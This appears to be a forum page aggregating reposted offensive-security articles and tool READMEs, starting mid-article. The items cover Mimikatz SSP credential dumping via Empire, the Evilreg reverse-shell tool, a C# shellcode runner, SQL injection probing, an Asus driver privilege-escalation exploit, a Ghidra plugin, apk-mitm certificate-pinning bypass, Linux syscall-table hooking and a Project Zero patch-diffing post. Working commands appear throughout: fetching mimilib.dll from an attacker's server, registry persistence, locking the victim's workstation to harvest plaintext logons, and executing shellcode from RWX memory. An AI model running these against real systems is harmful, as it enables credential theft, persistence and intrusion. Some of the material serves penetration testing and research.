mimikatz_dynwrapx set MIMICMD misc::memssp execute 1 2 3 use mimikatz_dynwrapx set MIMICMD misc::memssp execute Once the above exploit has successfully executed itself, use the following commands to force the user to sign out of the windows and then run the dll command to read the mimilsa file: cmdshell 0 RunDll32.exe user32.dll,LockWorkStation type mimilsa.log 1 2 3 cmdshell 0 RunDll32.exe user32.dll,LockWorkStation type mimilsa.log As shown in the above image, you will have your credentials. PowerShell Empire Empire is an outstanding tool, we have covered the PowerShell empire in a series of article, to read the article click here. With the help of mimikatz, empire allows us to inject the payload in the memory which further allows us to retrieve windows logon credentials. Once to have a session through the empire, use the following post exploit to get your hands on the credentials: usemodule persistence/misc/memssp execute 1 2 usemodule persistence/misc/memssp execute After the exploit has executed itself successfully, all that is left to do is lock the user out of their system so that when they sign in, we can have the file that saves credentials in plaintext for us. And no to lock the user out of their system use the following exploit: usemodule management/lock execute 1 2 usemodule management/lock execute After the user logs in, the said file will be created. To read the contents of the file use the following command: type C:\Windows\System32\mimilsa.log 1 type C:\Windows\System32\mimilsa.log Powershell Empire: mimilib.dll In the manual method, everything that w did can also be done remotely through empire which is useful in external penetration testing. The first step in this method is to send the mimilib.dll file from mimikatz folder to the system32 folder in the target system. 
To do so, simply go to the mimikatz folder where the mimilib.dll file is located and initiate the python server as shown in the following image: python -m SimpleHTTPServer 1 python -m SimpleHTTPServer After that, through your session, run the following set shell commands to do the deed: shell wget http://192.168.1.112:8000/mimilib.dll -outfile mimilib.dll reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" shell reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f 1 2 3 shell wget http://192.168.1.112:8000/mimilib.dll -outfile mimilib.dll reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" shell reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f From the above set of commands, the first command will download mimilib.dll from your previously made python server into the target PC and the rest of the two commands will edit the registry key value for you. As the commands have executed successfully, all now you have to do is wait for the target system to restart. And once that happens your file will be created. To access the file, use the following command: shell type kiwissp.log 1 shell type kiwissp.log And we have our credentials. Yay! Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here Sursa: https://www.hackingarticles.in/credential-dumping-security-support-provider-ssp/
-
Evilreg v1.0 Author: github.com/thelinuxchoice Twitter: twitter.com/linux_choice Read the license before using any part from this code Reverse shell using Windows Registry file (.reg). Features: Reverse TCP Port Forwarding using Ngrok.io Requirements: Ngrok Authtoken (for TCP Tunneling): Sign up at: https://ngrok.com/signup Your authtoken is available on your dashboard: https://dashboard.ngrok.com Install your auhtoken: ./ngrok authtoken <YOUR_AUTHTOKEN> Target must reboot/re-login after installing the .reg file Legal disclaimer: Usage of Evilreg for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program Usage: git clone https://github.com/thelinuxchoice/evilreg cd evilreg bash evilreg.sh Donate! Pay a coffee: Paypal: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CLKRT5QXXFJY4&source=url Sursa: https://github.com/thelinuxchoice/evilreg
-
Offensive P/Invoke: Leveraging the Win32 API from Managed Code Matt Hand Follow Aug 14, 2019 · 6 min read With the rise in offensive .NET, particularly C#, tooling, we are seeing a great expansion in operational capability, especially with regards to running our code in memory (e.g. Cobalt Strike’s execute-assembly). While C# provides a great deal of functionality on the surface, sometimes we need to leverage functions of the operating system not readily accessible from managed code. Thankfully, .NET offers and integration with the Windows API through a technology called Platform Invoke, or P/Invoke for short. Why P/Invoke? Consider this common situation: you need to allocate memory in your current process to copy in shellcode and then create a new thread to execute it. Because the Common Language Runtime (CLR) manages things like memory allocation for us, hence the term “managed code”, this is not possible through the built-in functionality of .NET. To use the 2 functions we need, VirtualAlloc() and CreateThread(), we need to be able to call them from “kernel32.dll”. This is where P/Invoke comes into play. P/Invoke, or specifically the System.Runtime.InteropServices namespace, provides the ability to call external DLLs with the DllImport attribute. In our example, we can simply import “kernel32.dll”, and reference the external methods VirtualAlloc() and CreateThread() using the exact same signature as the unmanaged (C/C++) one. Marshaling Because we are interacting with unmanaged functions from managed code, we need to be able to automatically handle things like datatype conversion. Simply put, that is what marshaling does for us. The graphic below shows a high-level overview of how your C# code interacts with unmanaged code. Credit: https://mark-borg.github.io/blog/2017/interop/ A practical example of this is converting an unmanaged function signature to a managed one. Let’s take the signature for VirtualAlloc() from our example above. LPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect ); We can see that VirtualAlloc() returns a pointer to a void object (LPVOID) and takes a LPVOID for the lpAddress parameter, an unsigned integer (SIZE_T) for dwSize, and a doubleword (DWORD) for the flAllocationType and flProtect parameters. Since these aren’t valid types in .NET, we need to convert them. I have created a table of types I have run into to help with the conversion: Using this table, the signature for VirtualAlloc() we would need to use in our C# code would be: [DllImport(“kernel32.dll”)] private static extern IntPtr VirtualAlloc( IntPtr lpStartAddr, uint size, uint flAllocationType, uint flProtect); In some cases, you may see ref or out prepended to the type. These tell the compiler that data can flow in or out of the function. ref specifies both directions and out specifies that data will only come out of the function. Handling Character Encoding Sometimes you may see additional enumerations in a DllImport such as the following: [DllImport(“user32.dll”), Charset = CharSet.Unicode, SetLastError = true] The Charset definition is used to specify either ANSI or Unicode encoding. To tell whether you may need to specify this, consider the function you are calling and the data you are processing. Typically, a function which ends in “A”, such as MessageBoxA(), will handle ANSI text and a function which ends in “W”, such as MessageBoxW() will handle “wide” or Unicode text. 
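As a concrete illustration (not taken from the original article), a Unicode-aware import of MessageBoxW could be declared and used as follows; note that the CharSet and SetLastError fields go inside the DllImport attribute's parentheses:

using System;
using System.Runtime.InteropServices;

class Demo
{
    // Strings are marshaled as UTF-16 (LPWStr) because of CharSet.Unicode.
    [DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    private static extern int MessageBoxW(IntPtr hWnd, string lpText, string lpCaption, uint uType);

    static void Main()
    {
        // uType 0 == MB_OK
        MessageBoxW(IntPtr.Zero, "Hello from P/Invoke", "Demo", 0);
    }
}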
By default, this is set to CharSet.Ansi in C#, so leaving this blank will use ANSI text encoding. Catching Win32 Errors The SetLastError field is a way to manage consuming API error messages that we would otherwise miss due to (un)marshaling. Simply put, this just provides us with the ability to handle errors in our external function via a call to Marshal.GetLastWin32Error(). Consider the following code: if (RemoveDirectory(@”C:\Windows\System32")) Console.Writeline(“This won’t work”); else Console.WriteLine(Marshal.GetLastWin32Error()); In this code, when RemoveDirectory() fails, it will print out the Win32 error code describing the failure. This code could either be parsed by the FormatMessage() function or through throw new Win32Exception(Marshal.GetLastWin32Error());. I would recommend using this functionality in your code, at least while testing/debugging, to avoid missing important error messages. Structs Many of the same concepts described above apply to structs. We simply convert the Windows datatypes to .NET datatypes. For example, the ShellExecuteInfo struct used by ShellExecute() goes from this: typedef struct ShellExecuteInfo { DWORD cbSize; ULONG fMask; HWND hwnd; LPCSTR lpVerb; LPCSTR lpFile; LPCSTR lpParameters; LPCSTR lpDirectory; int nShow; HINSTANCE hInstApp; void *lpIDList; LPCSTR lpClass; HKEY hkeyClass; DWORD dwHotKey; HANDLE hIcon; HANDLE hMonitor; HANDLE hProcess; } To this: public struct ShellExecuteInfo { public int cbSize; public uint fMask; public IntPtr hwnd; [MarshalAs(UnmanagedType.LPTStr)] public string lpVerb; [MarshalAs(UnmanagedType.LPTStr)] public string lpFile; [MarshalAs(UnmanagedType.LPTStr)] public string lpParameters; [MarshalAs(UnmanagedType.LPTStr)] public string lpDirectory; public int nShow; public IntPtr hInstApp; public IntPtr lpIDList; [MarshalAs(UnmanagedType.LPTStr)] public string lpClass; public IntPtr hkeyClass; public uint dwHotKey; public IntPtr hIcon; public IntPtr hProcess; } You will notice lines containing [MarshalAs(UnmanagedType.LPTStr)]. This is because strings copied from managed to unmanaged format are not copied back when the call returns. This line simply gives us the ability to marshal strings by explicitly stating how to. Enums Enumerators, or enums, are arguably the least headache-inducing of all of these sections. The easiest way to think about enums is by comparing them to dictionaries — they map something to something else. Here is an example enum: public enum StateEnum { MEM_COMMIT = 0x1000, MEM_RESERVE = 0x2000, MEM_FREE = 0x10000 } We could then use these mappings in our functions. For example: VirtualAlloc(0, 400 ,(uint)StateEnum.MEM_COMMIT, 0x40); Which could also be represented as: VirtualAlloc(0, 400 ,0x1000, 0x40); Practical Example Back to the original problem — running our shellcode. Using the knowledge we’ve gained, we can combine the sections into a working proof of concept. P/Invoke Declarations We start our program off by including the required namespace. using System; using System.Runtime.InteropServices; Then we declare our external functions in our class. 
Practical Example
Back to the original problem — running our shellcode. Using the knowledge we've gained, we can combine the sections into a working proof of concept.

P/Invoke Declarations
We start our program off by including the required namespaces.

using System;
using System.Runtime.InteropServices;

Then we declare our external functions in our class.

[DllImport("kernel32.dll")]
private static extern IntPtr VirtualAlloc(
  IntPtr lpStartAddr,
  uint size,
  uint flAllocationType,
  uint flProtect);

[DllImport("kernel32.dll")]
private static extern IntPtr CreateThread(
  uint lpThreadAttributes,
  uint dwStackSize,
  IntPtr lpStartAddress,
  IntPtr param,
  uint dwCreationFlags,
  ref uint lpThreadId);

[DllImport("kernel32.dll")]
private static extern bool CloseHandle(IntPtr handle);

[DllImport("kernel32.dll")]
private static extern uint WaitForSingleObject(
  IntPtr hHandle,
  uint dwMilliseconds);

Don't forget about our enums!

public enum StateEnum {
  MEM_COMMIT = 0x1000,
  MEM_RESERVE = 0x2000,
  MEM_FREE = 0x10000
}

public enum Protection {
  PAGE_READONLY = 0x02,
  PAGE_READWRITE = 0x04,
  PAGE_EXECUTE = 0x10,
  PAGE_EXECUTE_READ = 0x20,
  PAGE_EXECUTE_READWRITE = 0x40,
}

Writing the Main() Method
With all of the supporting functions defined, we start by creating a byte array containing our shellcode in the Main() method.

byte[] shellcode = new byte[319] {0xfc,0xe8,…};

Using VirtualAlloc(), we allocate the required amount of memory along with values defined in our enums.

IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, (uint)StateEnum.MEM_COMMIT, (uint)Protection.PAGE_EXECUTE_READWRITE);

Then we use Marshal.Copy() to copy our shellcode from managed memory into the unmanaged memory we just allocated, whose address is stored in the variable funcAddr.

Marshal.Copy(shellcode, 0, funcAddr, shellcode.Length);

Now our shellcode is written into an executable portion of memory. The last thing to do before we execute is to set up a few pieces we'll need for the execution itself.

IntPtr hThread = IntPtr.Zero;
uint threadId = 0;
IntPtr pinfo = IntPtr.Zero;

With that out of the way, we can create a thread that will execute our payload by setting the lpStartAddress parameter to the function address of our shellcode.

hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);

To be a little cleaner, we can use WaitForSingleObject() to wait an infinite amount of time, specified by 0xFFFFFFFF, for the thread to exit. Once it finishes, we will return void and the program will exit.

WaitForSingleObject(hThread, 0xFFFFFFFF);

I've created a public Gist in case the formatting is a little confusing. https://gist.github.com/matterpreter/6ddfbdcb9511dd6933e6d3474709c32c

Closing Notes
While this example shows a common use case for P/Invoke, you are limited only by your imagination when it comes to other uses. For example, in the mock directory UAC bypass, I had to use the unmanaged CreateDirectory() function to create C:\Windows \ because the managed System.IO.Directory.CreateDirectory function could not handle the space at the end of the directory name. Using P/Invoke was one way to get this technique to work in .NET and is especially common for the Win32 API calls that use null-terminated strings versus Native API calls that use counted Unicode strings.

One of the OPSEC concerns to keep in mind when using P/Invoke is suspicious imports. Because imported DLLs are a simple piece of data to collect for defenders, importing something odd or out of place could tip off anyone investigating your assembly. One method of evasion is to dynamically invoke unmanaged code. An example of this was recently added to SharpSploit by @TheRealWover.

Sursa: https://posts.specterops.io/offensive-p-invoke-leveraging-the-win32-api-from-managed-code-7eef4fdef16d
-
Same Same But Different: Discovering SQL Injections Incrementally with Isomorphic SQL Statements April 5, 2020 Motivation Despite the increased adoption of Object-Relational Mapping (ORM) libraries and prepared SQL statements, SQL injections continue to turn up in modern applications. Even ORM libraries have introduced SQL injections due to mistakes in translating object mappings to raw SQL statements. Of course, legacy applications and dangerous development practices also contribute to SQL injection vulnerabilities. Initially, I faced difficulties identifying SQL injections. Unlike another common vulnerability class, Cross-Site Scripting (XSS), endpoints vulnerable to SQL injections usually don't provide feedback on where and how you're injecting into the SQL statement. For XSS, it's simple: with the exception of Blind XSS (where the XSS ends up in an admin panel or somewhere you don't have access to), you always see where your payload ends up in the HTML response. For SQL injections, the best case scenario is that you get a verbose stack trace that tells you exactly what you need: HTTP/1.1 500 Internal Server Error Content-Type: text/html; charset=utf-8 <div id="error"> <h1>Database Error</h1> <div class='message'> SQL syntax error near '''' where id=123' at line 1: update common_member SET name=''' where id=123 </div> </div> If you see this, it's your lucky day. More often, however, you will either get a generic error message, or worse, no error at all – only an empty response. HTTP/1.1 200 OK Content-Type: application/json { "users": [] } As such, hunting SQL injections can be arduous and time-consuming. Many researchers prefer to do a single pass with automated tools like sqlmap and call it a day. However, running these tools without specific configurations is a blunt instrument that is easily detected and blocked by Web Application Firewalls (WAF). Furthermore, SQL injections occur in unique contexts; you might be injecting after a WHERE or LIKE or ORDER BY and each context requires a different kind of injection. This is even before various sanitization steps are applied. Polyglots help researchers use a more targeted approach. However, polyglots, by their very definition, try to execute in multiple contexts at once, often sacrificing stealth and succinctness. Take for example the SQLi Polyglots from Seclists: SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ Any half-decent WAF would pick up on these payloads and block them. In real-world scenarios, researchers need to balance two concerns when searching for SQL injections: Ability to execute and thus identify injections in multiple contexts Ability to bypass WAFs and sanitization steps A researcher can resolve this efficiently with something I call Isomorphic SQL Statements (although I'm sure other researchers have different names for it). Incremental Approaches to Discovering Vulnerabilities Going back to the XSS analogy, while XSS scanners and fuzzing lists are a dime a dozen, they usually don't work too well due to the above mentioned WAF blocking and unique contexts. 
Recently, more advanced approaches to automated vulnerability discovery have emerged which try to address the downsides of bruteforce scanning, like James Kettle's Backslash Powered Scanning. As Kettle writes, Rather than scanning for vulnerabilities, we need to scan for interesting behaviour. In turn, automation pipeline tools like Ameen Mali's qsfuzz and Project Discovery's nuclei test against defined heuristic rules (“interesting behaviour”) rather than blindly bruteforcing payloads. This is the path forward for large-scale vulnerability scanning as more organizations adopt WAFs and better development practices. For example, when testing for an XSS, instead of asking “does an alert box pop when I put in this payload?”, I prefer to ask “does this application sanitize single quotes? How about angle brackets?” The plus side of this is that you can easily automate this on a large scale without triggering all but the most sensitive WAFs. You can then follow up with manual exploitation for each unique context. The same goes for SQL injections. But how do you formulate your tests without any feedback mechanisms? Remember that SQL injections differ from XSS in that usually no (positive) response is given. Nevertheless, one thing I've learned from researchers like Ian Bouchard is that even no news is good news. This is where Isomorphic SQL Statements come into play. Applied here, isomorphic simply means SQL statements that are written differently but theoretically should return the same output. However, the difference is that you will be testing SQL statements which include special characters like ' or -. If the characters are properly escaped, the injected SQL statement will fail to evaluate to the same result as the original. If they aren't properly escaped, you'll get the same result, which indicates an SQL injection is possible. Let's illustrate this with a simple toy SQL injection: CREATE TABLE Users ( ID int key auto_increment, LastName varchar(255), FirstName varchar(255), Address varchar(255), City varchar(255) ); INSERT INTO Users (LastName, FirstName, Address, City) VALUES ('Bird', 'Big', '123 Sesame Street', 'New York City'); INSERT INTO Users (LastName, FirstName, Address, City) VALUES ('Monster', 'Cookie', '123 Sesame Street', 'New York City'); SELECT FirstName FROM Users WHERE ID = <USER INPUT>; If you are fuzzing with a large list of SQL polyglots, it would be relatively trivial to pick up the injection, but in reality the picture will be complicated by WAFs, sanitization, and more complex statements. Next, consider the following statements: SELECT FirstName FROM Users WHERE ID = 1; SELECT FirstName FROM Users WHERE ID = 2-1; SELECT FirstName FROM Users WHERE ID = 1+''; They should all evaluate to the same result if the special characters in the last two statements are injected unsanitized. If they don't evaluate to the same results, the server is sanitizing them in some way. Now consider a common version of a search query, SELECT Address FROM Users WHERE FirstName LIKE '%<USER INPUT>%' ORDER BY Address DESC;: SELECT Address FROM Users WHERE FirstName LIKE '%Big%' ORDER BY Address DESC; SELECT Address FROM Users WHERE FirstName LIKE '%Big%%%' ORDER BY Address DESC; SELECT Address FROM Users WHERE FirstName LIKE '%Big%' '' ORDER BY Address DESC; Simply by injecting the same special character % twice in the second statement, we are given a clue about the actual SQL statement you are injecting into (it's after a LIKE operator) if you receive the same response back. 
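To make that comparison concrete, here is a rough sketch of the check as code. Everything about the target is hypothetical (the URL and the id parameter are placeholders), and in practice you would strip dynamic content such as timestamps or CSRF tokens before comparing responses:

import requests

BASE_URL = "https://target.example/item"   # hypothetical endpoint taking ?id=<number>

def fetch(value):
    r = requests.get(BASE_URL, params={"id": value}, timeout=10)
    return r.status_code, r.text            # in practice, normalize dynamic content first

def probably_injectable(original="1"):
    baseline = fetch(original)
    # A different, valid value should NOT look like the baseline;
    # otherwise the parameter is probably ignored server-side.
    if fetch("999999") == baseline:
        return False
    # Isomorphic probes: identical responses are only expected if the special
    # characters reach the SQL statement unsanitized.
    probes = ["2-1", original + "+''", "(" + original + ")"]
    hits = sum(1 for p in probes if fetch(p) == baseline)
    return hits >= 2   # count several probes rather than trusting a single one

print(probably_injectable())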
Even better, as Arne Swinnen noted way back in 2013 (a pioneer!):

"Strings: split a valid parameter's string value in two parts, and add an SQL string concat directive in between. An identical response for both requests would again give you reason to believe you have just hit an SQL injection."

We can achieve the same isomorphic effect for strings as for numeric IDs simply by adding ' ' to our injection in the third statement. This is interpreted as concatenating the original string with a blank string, which should also return the same response while indicating that ' isn't being properly escaped. From here, it is a simple matter of experimenting incrementally. You thus achieve two objectives:

Discover which injectable characters are entered unsanitized into the final SQL statement
Discover the original SQL statement you are injecting into

Mass Automation and Caveats
The goal of this is not only to discover individual SQL injections, but to be able to automate and apply this across large numbers of URLs and inputs. Traditional SQL injection payload lists or scanners make large-scale scanning noisy and resource-intensive. With the incremental isomorphic approach, you apply a heuristic rule like:

if (response of id_input) === (response of id_input + "+''"):
    return true
else:
    return false

This is much lighter and faster. Of course, while you gain in terms of fewer false negatives (e.g. polyglots that work but are blocked by WAFs), you lose in terms of more false positives. For example, there are cases where the backend simply trims all non-numeric characters before entering an SQL statement, in which case the above isomorphic statement would still succeed. Thus, rather than relying on a single isomorphic statement (binary signal), you will want to watch for multiple isomorphic statements succeeding (spectrum signal).

Although SQL injections are getting rarer, I've still come across them occasionally in manual tests. A mass scanning approach will yield even better results.

Sursa: https://spaceraccoon.dev/same-same-but-different-discovering-sql-injections-incrementally-with
-
For more content like this, subscribe to this channel, and join our community at https://aka.ms/SecurityCommunity.
-
In this video we'll take a look at unpacking a trojan with Ghidra, x64dbg and Scylla. You'll also see how some anti-analysis tricks can affect the disassembly/decompiler output and ways to get around it. And finally, use x64dbg and Scylla to dump and fix the unpacked executable. You can find the original executable along with the shellcode and dumped samples on my Github: https://github.com/jstrosch/malware-s...
-
Asus AsIO2 LPE exploit, based on rewolf-msi-exploit

Blog posts:
- Research: https://syscall.eu/blog/2020/03/30/asus_gio/
- Exploitation: http://syscall.eu/blog/2020/04/04/asus_gio_exploit/

This exploit is an extension of ReWolf's exploit. More info can be found here: http://blog.rewolf.pl/blog/?p=1630

Fork notes by Raphaël Rigo:
- patched the C++ code to support compilation with MinGW
- added a Makefile
- added a provider for AsIO2
- added EPROCESS Token offset for recent Windows versions

Compilation under Linux:
- Install MinGW64: apt install mingw-w64
- run make in MsiExploit folder

Compilation under Windows:
- install python, make sure it's in your path
- pip install cryptodome
- run nmake -f Makefile.nmake in MsiExploit folder

Sursa: https://github.com/trou/asus-asio2-lpe-exploit
-
REPLICA
TAME THE DRAGON

✨ Features
⚡ Disassemble missed instructions - Define code that Ghidra's auto analysis missed
⚡ Detect and fix missed functions - Define functions that Ghidra's auto analysis missed
⚡ Fix 'undefinedN' datatypes - Enhance disassembly and decompilation by fixing 'undefinedN' DataTypes
⚡ Set MSDN API info as comments - Integrate information about functions, arguments and return values into Ghidra's disassembly listing in the form of comments
⚡ Tag functions based on API calls - Rename functions that call one or more APIs with the API name and API type family if available
⚡ Detect and mark wrapper functions - Rename wrapper functions with the wrapping level and wrapped function name
⚡ Fix undefined data and strings - Define ASCII strings that Ghidra's auto analysis missed and convert undefined bytes in the data segment into DWORDs/QWORDs
⚡ Detect and label crypto constants - Search for and label constants known to be associated with cryptographic algorithms in the code
⚡ Detect and comment stack strings - Find and post-comment stack strings
⚡ Detect and label indirect string references - Find and label references to existing strings
⚡ Detect and label indirect function calls - Find and label references to existing functions
⚡ Rename functions based on string references - Rename functions that reference one or more strings with the function name followed by the string name
⚡ Bookmark string hints - Bookmark interesting strings (file extensions, browser agents, registry keys, etc.)

🚀 Installation:
- Copy the repository files into any of the ghidra_scripts directories and extract db.7z; the directories can be found from Window -> Script Manager -> Script Directories
- Search for replica and enable it in the tool options
- Done!

🔒 License
Licensed under GNU General Public License v3.0

⛏️ BUG? OPEN NEW ISSUE

Sursa: https://github.com/reb311ion/replica
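For a taste of what this kind of Ghidra scripting looks like, here is a small standalone sketch in the spirit of the "Bookmark string hints" feature. It only uses Ghidra's stock flat API and is not REPLICA's actual code; run it from the Script Manager (Jython) and adjust the hint list to taste:

# Sketch of the "bookmark string hints" idea as a standalone Ghidra (Jython) script.
HINTS = [".exe", ".dll", "HKEY_", "SOFTWARE\\", "User-Agent", "http://", "https://"]

listing = currentProgram.getListing()
count = 0
for data in listing.getDefinedData(True):          # iterate all defined data, forward
    dt_name = data.getDataType().getName().lower()
    if "string" not in dt_name and "unicode" not in dt_name:
        continue                                    # only look at defined string data
    text = str(data.getValue())
    if any(h.lower() in text.lower() for h in HINTS):
        createBookmark(data.getMinAddress(), "StringHints", text[:80])
        count += 1

print("Bookmarked %d interesting strings" % count)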
-
apk-mitm
A CLI application that automatically prepares Android APK files for HTTPS inspection

Inspecting a mobile app's HTTPS traffic using a proxy is probably the easiest way to figure out how it works. However, with the Network Security Configuration introduced in Android 7 and app developers trying to prevent MITM attacks using certificate pinning, getting an app to work with an HTTPS proxy has become quite tedious.

apk-mitm automates the entire process. All you have to do is give it an APK file and apk-mitm will:
- decode the APK file using Apktool
- modify the app's AndroidManifest.xml to make it debuggable
- modify the app's Network Security Configuration to allow user-added certificates
- insert return-void opcodes to disable certificate pinning logic
- encode the patched APK file using Apktool
- sign the patched APK file using uber-apk-signer

You can also use apk-mitm to patch apps using Android App Bundle and rooting your phone is not required.

Usage
If you have an up-to-date version of Node.js (8.2+) and Java (8+), you can run this command to patch an app:

$ npx apk-mitm <path-to-apk>

So, if your APK file is called example.apk, you'd run:

$ npx apk-mitm example.apk
✔ Decoding APK file
✔ Modifying app manifest
✔ Modifying network security config
✔ Disabling certificate pinning
✔ Encoding patched APK file
✔ Signing patched APK file
Done! Patched APK: ./example-patched.apk

You can now install the example-patched.apk file on your Android device and use a proxy like Charles or mitmproxy to look at the app's traffic.

Patching App Bundles
You can also patch apps using Android App Bundle with apk-mitm by providing it with a *.xapk file (for example from APKPure) or a *.apks file (which you can export yourself using SAI).

Making manual changes
Sometimes you'll need to make manual changes to an app in order to get it to work. In these cases the --wait option is what you need. Enabling it will make apk-mitm wait before re-encoding the app, allowing you to make changes to the files in the temporary directory.

Caveats
- If the app uses Google Maps and the map is broken after patching, then the app's API key is probably restricted to the developer's certificate. You'll have to create your own API key without restrictions and run apk-mitm with the --wait option to be able to replace the com.google.android.geo.API_KEY value in the app's AndroidManifest.xml file.
- If apk-mitm crashes while decoding or encoding, the issue is probably related to Apktool. Check their issues on GitHub to find possible workarounds. If you happen to find an Apktool version that's not affected by the issue, you can instruct apk-mitm to use it by specifying the path of its JAR file through the --apktool option.

Installation
The above example used npx to download and execute apk-mitm without local installation. If you do want to fully install it, you can do that by running:

$ npm install -g apk-mitm

Thanks
- Connor Tumbleson for making an awesome APK decompiler
- Patrick Favre-Bulle for making a very simple tool for signing APKs

License
MIT © Niklas Higi

Sursa: https://github.com/shroudedcode/apk-mitm
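If you ever need to reproduce just the Network Security Configuration step by hand on an Apktool-decoded app (for example when you don't want the other patches), it amounts to dropping in the standard "trust user-added certificates" config and pointing the manifest at it. A rough sketch; the decoded directory name is only an example:

import os

# The standard "trust user-added CAs" network security config (documented AOSP format).
NSC = """<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
    <base-config>
        <trust-anchors>
            <certificates src="system" />
            <certificates src="user" />
        </trust-anchors>
    </base-config>
</network-security-config>
"""

decoded_dir = "example-decoded"           # hypothetical: output of `apktool d example.apk`
xml_dir = os.path.join(decoded_dir, "res", "xml")
os.makedirs(xml_dir, exist_ok=True)
with open(os.path.join(xml_dir, "network_security_config.xml"), "w") as f:
    f.write(NSC)
# Then add android:networkSecurityConfig="@xml/network_security_config"
# to the <application> element in AndroidManifest.xml before rebuilding and re-signing.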
-
Linux kernel 5.3 breaks the classic CR0 write trick by pinning the register's sensitive bits, so the write-protect (WP) bit can no longer simply be cleared. Today let's discuss how we can write to the syscall table directly and not rely on the CR0 write exploit that we have been using. I heard about this method some time ago and I thought it had long been patched and wouldn't work. However, as Nasm points out, the ptr exploit still works and still has application.

https://en.wikipedia.org/wiki/Control...
https://outflux.net/blog/archives/201...

From the site above:

x86 CR4 & CR0 pinning
In recent exploits, one of the steps for making the attacker's life easier is to disable CPU protections like Supervisor Mode Access (and Execute) Prevention (SMAP and SMEP) by finding a way to write to CPU control registers to disable these features. For example, CR4 controls SMAP and SMEP, where disabling those would let an attacker access and execute userspace memory from kernel code again, opening up the attack to much greater flexibility. CR0 controls Write Protect (WP), which when disabled would allow an attacker to write to read-only memory like the kernel code itself. Attacks have been using the kernel's CR4 and CR0 writing functions to make these changes (since it's easier to gain that level of execute control), but now the kernel will attempt to "pin" sensitive bits in CR4 and CR0 to avoid them getting disabled. This forces attacks to do more work to enact such register changes going forward. (I'd like to see KVM enforce this too, which would actually protect guest kernels from all attempts to change protected register bits.)
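Whichever write primitive ends up being used, the syscall table's address is needed first. On a stock kernel the quickest sanity check is /proc/kallsyms (root required, and kptr_restrict may blank the addresses); a tiny helper along these lines, purely illustrative:

#!/usr/bin/env python3
# Look up sys_call_table in /proc/kallsyms (run as root; kptr_restrict may hide it).
def find_symbol(name="sys_call_table"):
    with open("/proc/kallsyms") as f:
        for line in f:
            parts = line.split()
            if len(parts) < 3:
                continue
            addr, _type, sym = parts[:3]
            if sym == name:
                return int(addr, 16)
    return None

addr = find_symbol()
if addr:
    print("sys_call_table @ 0x%x" % addr)
else:
    print("symbol not exported or hidden (check kptr_restrict / run as root)")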
-
Thursday, April 2, 2020 TFW you-get-really-excited-you-patch-diffed-a-0day-used-in-the-wild-but-then-find-out-it-is-the-wrong-vuln Posted by Maddie Stone, Project Zero INTRODUCTION I’m really interested in 0-days exploited in the wild and what we, the security community, can learn about them to make 0-day hard. I explained some of Project Zero’s ideas and goals around in-the-wild 0-days in a November blog post. On December’s Patch Tuesday, I was immediately intrigued by CVE-2019-1458, a Win32k Escalation of Privilege (EoP), said to be exploited in the wild and discovered by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. Later that day, Kaspersky published a blog post on the exploit. The blog post included details about the exploit, but only included partial details on the vulnerability. My end goal was to do variant analysis on the vulnerability, but without full and accurate details about the vulnerability, I needed to do a root cause analysis first. I tried to get my hands on the exploit sample, but I wasn't able to source a copy. Without the exploit, I had to use binary patch diffing in order to complete root cause analysis. Patch diffing is an often overlooked part of the perpetual vulnerability disclosure debate, as vulnerabilities become public knowledge as soon as a software update is released, not when they are announced in release notes. Skilled researchers can quickly determine the vulnerability that was fixed by comparing changes in the codebase between old and new versions. If the vulnerability is not publicly disclosed before or at the same time that the patch is released, then this could mean that the researchers who undertake the patch diffing effort could have more information than the defenders deploying the patches. While my patch diffing adventure did not turn out with me analyzing the bug I intended (more on that to come!), I do think my experience can provide us in the community with a data point. It’s rarely possible to reference hard timelines for how quickly sophisticated individuals can do this type of patch-diffing work, so we can use this as a test. I acknowledge that I have significant experience in reverse engineering, however I had no previous experience at all doing research on a Windows platform, and no knowledge of how the operating system worked. It took me three work weeks from setting up my first VM to having a working crash proof-of-concept for a vulnerability. This can be used as a data point (likely a high upper bound) for the amount of time it takes for individuals to understand a vulnerability via patch diffing and to create a working proof-of-concept crasher, since most individuals will have prior experience with Windows. But as I alluded to above, it turns out I analyzed and wrote a crash POC for not CVE-2019-1458, but actually CVE-2019-1433. I wrote this whole blog post back in January, went through internal reviews, then sent the blog post to Microsoft to preview (we provide vendors with 24 hour previews of blog posts). That’s when I learned I’d analyzed CVE-2019-1433, not CVE-2019-1458. At the beginning of March, Piotr Florczyk published a detailed root cause analysis and POC for the “real” CVE-2019-1458 bug. With the “real” root cause analysis for CVE-2019-1458 now available, I decided that maybe this blog post could still be helpful to share what my process was to analyze Windows for the first time and where I went wrong. 
